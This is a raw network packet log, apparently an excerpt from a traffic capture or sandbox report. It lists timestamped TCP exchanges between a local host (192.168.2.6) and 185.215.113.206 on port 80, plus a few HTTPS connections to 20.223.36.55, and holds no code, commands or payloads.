Nov 23, 2024 07:09:19.495825052 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.495877981 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.497442007 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.497493982 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.497594118 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.497745991 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.499074936 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.499130964 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.499172926 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.499218941 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.500725031 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.500773907 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.500825882 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.500866890 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.502315998 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.502381086 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.502418995 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.502465963 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.503865957 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.503940105 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.503979921 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.504026890 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.505465984 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.505563974 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.505574942 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.505603075 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.507008076 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.507143974 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.507200956 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.508548975 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.508600950 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.508604050 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.508641958 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.510101080 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.510145903 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.510159016 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.510198116 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.539128065 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.539203882 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.539292097 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.539427996 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.539695024 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.539807081 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.539820910 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.539846897 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.540915012 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.540965080 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.541018963 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.541264057 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.542113066 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.542186975 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.542222023 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.542263031 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.543308020 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.543385029 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.543418884 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.543467999 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.544554949 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.544635057 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.544639111 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.544680119 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.545717955 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.545850992 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.545887947 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.545912027 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.546911955 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.546971083 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.546983004 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.547024965 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.548115015 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.548191071 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.548218012 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.548260927 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.549297094 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.549351931 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.549393892 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.549442053 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.550501108 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.550597906 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.550610065 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.550648928 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.551677942 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.551736116 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.551750898 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.551898956 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.552856922 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.552911997 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.552944899 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.553011894 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.553985119 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.554059982 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.597459078 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.597522974 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.597585917 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.597632885 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.598017931 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.598067045 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.598109007 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.598150969 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.599181890 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.599252939 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.599255085 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.599289894 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.600359917 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.600430012 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.600471973 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.600534916 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.601510048 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.601557016 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.601596117 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.601630926 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.602673054 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.602724075 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.602849007 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.602951050 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.603832006 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.603880882 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.603935957 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.603980064 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.605006933 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.605102062 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.605128050 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.605139017 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.606168985 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.606246948 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.606312990 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.606486082 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.607336044 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.607404947 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.607415915 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.607458115 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.608477116 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.608588934 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.608592987 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.608696938 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.609651089 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.609704971 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.609751940 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.609792948 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.610177040 CET	49727	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:19.610213041 CET	443	49727	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:19.610269070 CET	49727	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:19.610533953 CET	49727	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:19.610547066 CET	443	49727	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:19.610831022 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.610883951 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.610934973 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.611095905 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.611974001 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.612035036 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.612076998 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.612119913 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.613120079 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.613178968 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.613213062 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.613254070 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.614303112 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.614362001 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.614489079 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.614537001 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.615466118 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.615530968 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.615556002 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.615575075 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.629960060 CET	49728	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:19.629988909 CET	443	49728	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:19.630068064 CET	49728	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:19.652793884 CET	49728	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:19.652829885 CET	443	49728	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:19.664892912 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.664912939 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.664959908 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.664985895 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.665405989 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.665457964 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.665580988 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.665622950 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.666702986 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.666719913 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.666779041 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.667752981 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.667810917 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.667923927 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.667974949 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.669028044 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.669044018 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.669076920 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.669087887 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.670101881 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.670145988 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.670270920 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.670319080 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.671355009 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.671370029 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.671425104 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.671443939 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.672354937 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.672405005 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.672584057 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.672636032 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.673437119 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.673453093 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.673485994 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.673510075 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.674705029 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.674762964 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.674936056 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.675007105 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.676137924 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.676152945 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.676194906 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.676219940 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.677180052 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.677242041 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.677329063 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.677380085 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.678320885 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.678337097 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.678371906 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.678390980 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.679330111 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.679347038 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.679398060 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.679866076 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.679913044 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.679961920 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.680005074 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.681014061 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.681071043 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.681143045 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.681185961 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.682156086 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.682276964 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.682331085 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.683320999 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.683383942 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.683423996 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.683470011 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.684469938 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.684524059 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.684564114 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.684601068 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.685623884 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.685678959 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.685719013 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.685771942 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.686784983 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.686846972 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.686885118 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.686929941 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.687925100 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.687982082 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.688014030 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.688055992 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.689088106 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.689188957 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.689246893 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.690212011 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.690268993 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.731409073 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.731482029 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.731509924 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.731551886 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.733609915 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.733668089 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.733755112 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.733951092 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.734802008 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.734865904 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.734980106 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.734997034 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.735014915 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.735042095 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.735088110 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.735228062 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.735272884 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.736109972 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.736176968 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.736310959 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.736418962 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.737292051 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.737307072 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.737343073 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.737369061 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.738409996 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.738425970 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.738508940 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.738508940 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.739273071 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.739327908 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.739414930 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.739460945 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.740398884 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.740446091 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.740596056 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.740650892 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.741497993 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.741513968 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.741553068 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.741571903 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.742538929 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.742583990 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.742728949 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.742779016 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.743426085 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.743474960 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.743614912 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.743678093 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.744529963 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.744546890 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.744581938 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.744599104 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.789628029 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.789700985 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.789716005 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.789757967 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.790113926 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.790226936 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.790230036 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.790297031 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.791137934 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.791202068 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.791245937 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.791291952 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.792172909 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.792221069 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.792277098 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.792323112 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.793204069 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.793246984 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.793325901 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.793374062 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.794249058 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.794315100 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.794341087 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.794390917 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.795300007 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.795387030 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.795418978 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.795459986 CET	49717	80	192.168.2.6	185.215.113.206
